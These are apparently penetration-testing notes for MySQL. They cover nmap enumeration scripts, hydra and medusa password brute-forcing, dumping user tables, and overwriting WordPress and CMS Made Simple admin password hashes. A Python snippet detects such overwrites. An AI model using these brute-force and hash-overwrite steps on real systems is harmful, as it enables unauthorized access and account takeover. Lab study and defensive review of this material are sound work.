MySQL 3306

Basic commands; find more on specific SQL injection, enumeration and privilege escalation in the dedicated section.

#NMAP one-liner

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10

#hydra

If the NSE scripts or other enumeration find database users, brute-force their passwords with hydra

sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql

#Bruteforcing with medusa

medusa -h 10.10.10.10 -u bob -P rockyou.txt -t 4 -M mysql

-t takes the number of logins tested concurrently (the original note omitted the value, which medusa rejects); -M selects the mysql module.

#Internal database enum (more in SQL enum section)

show databases;
use textpattern;
show tables;
select * from users;
select username,email,password from users;

https://recipeforroot.com/mysql-to-system-root/ (good all-round guide)

#Resetting user admin password

This assumes you already have write access to the database and can see the admin password hash. In this example we overwrite the admin password of a WordPress site. WordPress accepts a bare MD5 value in user_pass for backward compatibility and rehashes it in its normal phpass format on the next successful login.

1) On Kali, hash the chosen password with MD5 (MD5 is a hash, not encryption; -n keeps the trailing newline out of the digest)

echo -n "redcliff" | md5sum

2) Run from within the MariaDB shell (ID = 1 is normally the first admin account)

update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;

3) Log in from the login panel → /wp-login.php

Variant (CMS Made Simple 2.2.13): the stored value is md5(sitemask + password), where sitemask comes from cms_siteprefs and is treated as empty if unset

update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';
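Both resets above leave a bare 32-character hex MD5 in the password column, whereas WordPress itself writes phpass ($P$...) or bcrypt hashes. That difference is what a defender or incident responder would look for when reviewing a dump of wp_users after a suspected compromise. The following is an added example, not code from the page or from WordPress or CMS Made Simple: it classifies stored hash formats, flags rows whose user_pass is a bare MD5 (constructed sample rows, not from any real site), and mirrors the CMS Made Simple md5(CONCAT(IFNULL(sitemask,''), password)) formula in Python so the value written by that SQL can be checked offline. The row data, the regexes and the function names are all assumptions of this example.

```python
import hashlib
import re
from typing import Iterable, List, Optional, Tuple

# Constructed wp_users-style rows (ID, user_login, user_pass); the values are made up
# for this example and do not come from any real installation.
SAMPLE_WP_USERS: List[Tuple[int, str, str]] = [
    (1, "admin", "8d70e0d1acb06b4648c7aa8927509660"),        # bare MD5: what a direct UPDATE leaves behind
    (2, "editor", "$P$Babcdefghijklmnopqrstuvwxyz0123"),      # normal phpass hash (34 chars)
    (3, "svc", "$2y$10$" + "a" * 53),                         # bcrypt-style hash
]

# Hash-format patterns (assumed for this example):
#   - bare MD5: 32 hex characters
#   - phpass as used by WordPress: "$P$" or "$H$" followed by 31 base64-ish characters
#   - bcrypt: "$2a$"/"$2b$"/"$2y$", two-digit cost, 53 characters of salt+hash
MD5_HEX = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
PHPASS = re.compile(r"^\$[PH]\$[./0-9A-Za-z]{31}$")
BCRYPT = re.compile(r"^\$2[aby]\$\d{2}\$[./0-9A-Za-z]{53}$")


def classify_hash(stored: str) -> str:
    """Return the format name of a stored password value: md5, phpass, bcrypt or unknown."""
    if MD5_HEX.match(stored):
        return "md5"
    if PHPASS.match(stored):
        return "phpass"
    if BCRYPT.match(stored):
        return "bcrypt"
    return "unknown"


def find_md5_password_rows(rows: Iterable[Tuple[int, str, str]]) -> List[Tuple[int, str]]:
    """Return (ID, user_login) for every account whose user_pass is a bare MD5 digest.

    WordPress never writes a bare MD5 itself, so such a row indicates the value was
    written straight into the table (as in the reset on this page) and deserves review.
    """
    return [(uid, login) for uid, login, stored in rows if classify_hash(stored) == "md5"]


def cmsms_password_hash(sitemask: Optional[str], password: str) -> str:
    """Python equivalent of md5(CONCAT(IFNULL(sitemask, ''), password)) from the CMS Made Simple variant.

    A missing sitemask (NULL in cms_siteprefs) is treated as the empty string, exactly as IFNULL does.
    """
    return hashlib.md5(((sitemask or "") + password).encode()).hexdigest()


if __name__ == "__main__":
    for uid, login in find_md5_password_rows(SAMPLE_WP_USERS):
        print(f"review: user ID {uid} ({login}) has a bare MD5 in user_pass")
    for uid, login, stored in SAMPLE_WP_USERS:
        print(uid, login, classify_hash(stored))
```

Run it against a real export by replacing SAMPLE_WP_USERS with the rows of `select ID, user_login, user_pass from wp_users;`; any row reported should be compared with the site's change history, since a legitimate WordPress password change never produces a bare MD5.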

#connecting remotely

mysql -u root -h 192.168.101.184 -p

-u sets the database user and -h the target host; -p with no value attached prompts for the password instead of leaving it in shell history
